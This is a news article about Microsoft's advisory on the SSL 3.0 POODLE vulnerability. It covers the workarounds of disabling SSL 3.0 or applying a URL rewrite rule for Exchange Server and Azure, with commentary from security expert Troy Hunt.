Microsoft Issues Advice on SSL 3.0 Security Vulnerability

Microsoft is offering more guidance regarding a Secure Sockets Layer (SSL) 3.0 security flaw, including how to disable SSL 3.0 for users of Exchange Server and Azure Websites.

SSL 3.0 is an encryption standard that's used to secure Web traffic using the HTTPS method. It has a flaw that could allow an attacker to decrypt information, such as authentication cookies, according to Microsoft. The U.S. Computer Emergency Readiness Team (US-CERT) issued a notice about SSL 3.0 earlier this month. The flaw was first disclosed by researchers using a Padding Oracle on Downgraded Legacy Encryption (POODLE) type of attack.

The POODLE attack compels the use of the flawed SSL 3.0 protocol, enabling the exploit. SSL 3.0 is an older protocol that's largely being replaced by the Transport Layer Security (TLS) protocol, which doesn't have this security flaw, according to US-CERT.

For the SSL 3.0 flaw to be exploited, attackers have to conduct a so-called "man-in-the-middle" kind of attack, so the exploit is considered difficult to pull off. However, it could be exploited more easily in networks subject to those kinds of attacks, such as Wi-Fi networks, according to US-CERT.

Microsoft's Advice
On October 14, Microsoft issued a security advisory noting that all supported Windows Server software uses the SSL 3.0 protocol and are "affected by this vulnerability." The advisory added that the vulnerability was "not considered high risk to customers." The SSL 3.0 flaw isn't considered to be a high-risk problem because attackers would have to make "several hundred HTTPS requests before the attack could be successful," according to Microsoft.

Microsoft's advisory offers workarounds that include disabling SSL 3.0 in Internet Explorer and in Windows. However, doing so will cause browser clients that rely on SSL 3.0 to fail in their server connections.

Microsoft recently offered additional advice for addressing the SSL 3.0 vulnerability, particularly for those using Exchange Server 2010 or Exchange Server 2013, as well as Azure Websites, Roles and Windows Virtual Machines.

For Exchange Server users, disabling SSL 3.0 on Windows Server will affect users with clients that don't support the more current TLS protocol, according to Microsoft. They won't be able to connect to the server. It will also affect other software, such as IIS, that might not support TLS. Users can test whether their browser clients are subject to POODLE attacks via this test page, according to Microsoft's announcement.

URL Rewrite Rule
Microsoft also indicated that Azure Websites, Roles and Windows Virtual Machines enable the SSL 3.0 protocol by default. SSL 3.0 can be disabled for those solutions, although Microsoft cautions that "we encourage customers to evaluate the risk of regression before implementing these changes." Alternatively, IT pros can "configure a custom action" should a browser attempt to establish an SSL 3.0 connection. The custom action can be set up using a code snippet, called a "URL rewrite rule," that's provided by Microsoft.

Security expert and Microsoft MVP, Troy Hunt, prefers using the URL rewrite rule over disabling SSL 3.0 on Azure. The reason is that disabling SSL 3.0 likely will cause connection problems for a small number of users. By using the URL rewrite rule, the SSL 3.0 connection is still made, but the attacker doesn't get the information needed to conduct an exploit, Hunt explained, in a blog post.

Hunt doesn't recommend ignoring the SSL 3.0 flaw. "Yes, this means that taking no action leaves you vulnerable," he wrote.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.


  • Microsoft Warns IT Pros on Windows Netlogon Fix Coming Next Month

    Microsoft on Thursday issued a reminder to organizations to ensure that their systems are properly patched for a "Critical"-rated Windows Netlogon vulnerability before next month's "update Tuesday" patch distribution arrives.

  • Microsoft Nudging Skype for Business Users to Teams

    Microsoft on Thursday announced some perks and prods for Skype for Business unified communications users, with the aim of moving them to the Microsoft Teams collaboration service instead.

  • How To Improve Windows 10's Sound and Video Quality

    Windows 10 comes with built-in tools that can help users get the most out of their sound and video hardware.

  • Microsoft Offers More 'Solorigate' Advice Using Microsoft 365 Defender Tools

    Microsoft issued yet another article with advice on how to use its Microsoft 365 Defender suite of tools to protect against "Solorigate" advanced persistent threat types of attacks in a Thursday announcement.

comments powered by Disqus